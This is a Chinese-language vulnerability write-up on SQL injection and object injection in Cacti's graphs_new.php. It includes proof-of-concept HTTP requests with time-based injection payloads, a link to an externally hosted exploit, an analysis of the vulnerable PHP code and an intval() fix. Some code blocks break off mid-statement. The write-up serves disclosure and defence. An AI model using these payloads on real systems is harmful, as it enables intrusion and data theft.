cacti后台SQL注入漏洞

   简介
   cacti后台SQL注入漏洞
   cacti /graphs_new.php中对$_POST["cg_g"]参数过滤不严,导致SQL注入的发生,可能导致敏感数据泄漏。

    解决方法在第4步

1. 漏洞描述

  other SQL injection vulnerability via graphs_new.php in cacti was found, reported to the bug http://bugs.cacti.net/view.php?id=2652

  Relevant Link:

  http://bobao.360.cn/snapshot/index?id=146936

2. 漏洞触发条件

  0x1: POC1: SQL Inject

  复制代码
  POST /cacti/graphs_new.php HTTP/1.1
  Host: 192.168.217.133
  Proxy-Connection: keep-alive
  Cache-Control: max-age=0
  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
  Origin: http://192.168.217.133 [^]
  Upgrade-Insecure-Requests: 1
  User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2526.80 Safari/537.36
  Content-Type: application/x-www-form-urlencoded
  DNT: 1
  Referer: http://192.168.217.133/cacti/graphs_new.php?host_id=3 [^]
  Accept-Encoding: gzip, deflate
  Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.6,en;q=0.4
  Cookie: 1c4af7f2e90e3a789e67a8e3acd2372f=8a83va6ijomgf7qdgfpcl8l1p2; Cacti=j8chtc1ppq4n7viqkbah6c4tv2
  Content-Length: 189

  __csrf_magic=sid%3Aed226a87fdcc8e055d1c27b620e564d629d95e40%2C1450241184&cg_g=033926697+xor+(select(0)from(select sleep(5))v)&save_component_graph=1&host_id=2&host_template_id=0&action=save
  复制代码
  0x2: POC2: Object Inject

  1. Login
  2. POST  http://target/cacti/graphs_new.php
     Data: __csrf_magic=sid%3A55c34c49f0a1e4abf5739766855abdfa96fbc91b%2C1448716384&action=save&save_component_new_graphs=1&host_id=1&selected_graphs_array=[injection]
      {Injection exp can be found on my server: http://pandas.pw/cacti.exp}
  3. mysql log: select graph_template_id from snmp_query_graph where id=1 and benchmark(20000000,sha1(1))--

3. 漏洞代码分析

  0x1: Vuls-1: Object Inject To SQL Inject

  /graphs_new.php

  复制代码
  /* set default action */
  if (!isset($_REQUEST["action"])) { $_REQUEST["action"] = ""; }
  switch ($_REQUEST["action"]) {
      case 'save':
          //track function form_save
          form_save();

          break;
      case 'query_reload':
          host_reload_query();

          header("Location: graphs_new.php?host_id=" . $_GET["host_id"]);
          break;
      default:
          include_once("./include/top_header.php");

          graphs();

          include_once("./include/bottom_footer.php");
          break;
  }
  复制代码
  form_save();

  复制代码
  function form_save() 
  {
      ..
      if (isset($_POST["save_component_new_graphs"])) 
      {
          //Track function host_new_graphs_save()
          host_new_graphs_save();

          header("Location: graphs_new.php?host_id=" . $_POST["host_id"]);
      }
  }
  复制代码
  host_new_graphs_save();

  复制代码
  function host_new_graphs_save() 
  {
      //variable $selected_graphs_array just unserialized the POST variable which we can control without filter.
      $selected_graphs_array = unserialize(stripslashes($_POST["selected_graphs_array"]));
      ..
      //Then the variable goes into a  three-dimensional array , and finally the dirty data we can control enter into the select database query, which caused a SQL injection.
      $graph_template_id = db_fetch_cell("select graph_template_id from snmp_query_graph where id=" . $snmp_query_array["snmp_query_graph_id"]);
      ..
  }
  复制代码
  0x2: Vuls-2: SQL Injection

  复制代码
  function form_save() 
  {
      if (isset($_POST["save_component_graph"])) 
      {
          /* summarize the 'create graph from host template/snmp index' stuff into an array */
          while (list($var, $val) = each($_POST)) 
          {
              if (preg_match('/^cg_(\d+)$/', $var, $matches)) 
              {
                  $selected_graphs["cg"]{$matches[1]}{$matches[1]} = true;
              }
              //cg_g is not filtered
              elseif (preg_match('/^cg_g$/', $var)) 
              {
                  if ($_POST["cg_g"]    0) 
                  {
                      $selected_graphs["cg"]{$_POST["cg_g"]}{$_POST["cg_g"]} = true;
                  }
              }
              elseif (preg_match('/^sg_(\d+)_([a-f0-9]{32})$/', $var, $matches)) 
              {
                  $selected_graphs["sg"]{$matches[1]}{$_POST{"sgg_" . $matches[1]}}{$matches[2]} = true;
              }
          }

          if (isset($selected_graphs)) 
          {
              //外部输入参数带入host_new_graphs中
              host_new_graphs($_POST["host_id"], $_POST["host_template_id"], $selected_graphs);
              exit;
          }

          header("Location: graphs_new.php?host_id=" . $_POST["host_id"]);
      }

      if (isset($_POST["save_component_new_graphs"])) {
          host_new_graphs_save();

          header("Location: graphs_new.php?host_id=" . $_POST["host_id"]);
      }
  }
  复制代码
  host_new_graphs(POST["hostid"],_POST["host_template_id"], $selected_graphs);

  复制代码
  function host_new_graphs($host_id, $host_template_id, $selected_graphs_array) {
      /* we use object buffering on this page to allow redirection to another page if no
      fields are actually drawn */
      ob_start();

      include_once("./include/top_header.php");

      print "

4. 防御方法

  /graphs_new.php

  复制代码
  function host_new_graphs_save() 
  {
      ..
      /*$graph_template_id = db_fetch_cell("select graph_template_id from snmp_query_graph where id=" . $snmp_query_array["snmp_query_graph_id"]);*/         --注释
      $graph_template_id = db_fetch_cell("select graph_template_id from snmp_query_graph where id=" . intval($snmp_query_array["snmp_query_graph_id"]));      --添加
      ..
  }
  复制代码
  /graphs_new.php

  复制代码
  function host_new_graphs($host_id, $host_template_id, $selected_graphs_array) {
      /* we use object buffering on this page to allow redirection to another page if no
      fields are actually drawn */
      ob_start();

      include_once("./include/top_header.php");

      print "